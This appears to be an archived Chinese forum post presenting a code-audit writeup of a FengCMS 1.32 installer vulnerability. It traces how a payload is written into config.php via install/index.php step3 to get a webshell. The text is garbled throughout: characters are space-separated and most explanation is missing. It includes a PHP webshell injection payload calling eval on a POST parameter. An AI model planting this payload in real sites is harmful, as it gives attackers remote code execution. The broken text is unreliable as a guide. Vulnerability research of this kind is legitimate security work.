[26536] 2020-11-29_[代码审计]fengcms1.32从详细漏洞分析到漏洞利用

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2020-11-29_[代码审计]fengcms1.32从详细漏洞分析到漏洞利用 [ ]   f e n g c m s 1 . 3 2 M 7 8   2 0 2 0 - 1 1 - 2 9   P A N D A # #   C m s F e n g C m s P H P + M Y S Q L F e n g C m s F e n g C m s F e n g C m s 9 5 % -   . p y t h o n   p o c / e x p
f e n g c m s p a y l o a d 使 w e b s h e l l g e t s h e l l - - / i n s t a l l / i n d e x . p h p i n s t a l l i n d e x . p h p 2 5 i n s t a l l j s G E T s t e p
- - / i n s t a l l / i n s t a l l . p h p P O S T
$ f i l e s $ c o n f i g $ c o n f i g ( ) $ f i l e / i n s t a l l / i n s t a l l . p h p 8
$ c o n f i g / i n s t a l l / d a t a . p h p f i l e _ g e t _ c o n t e n t s $ c o n f i g _ f i l e / i n s t a l l / i n d e x . p h p G E T s t e p 3 . p h p s t e p 3 . p h p
/ c o n f i g . p h p p a y l o a d p a y l o a d ' ) / / p a y l o a d c o n f i g . p h p
/ i n d e x . p h p / s y s t e m / a p p . p h p / s y s t e m / a p p . p h p 访 i n d e x . p h p c o n f i g . p h p p a y l o a d g e t s h e l l 1 访
s t e p 3 p a y l o a d
c o n f i g . p h p w e b s h e l l f _ ' ) ; e v a l ( $ _ P O S T [ ' x x ' ] ) ; / /
访 i n d e x . p h p
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则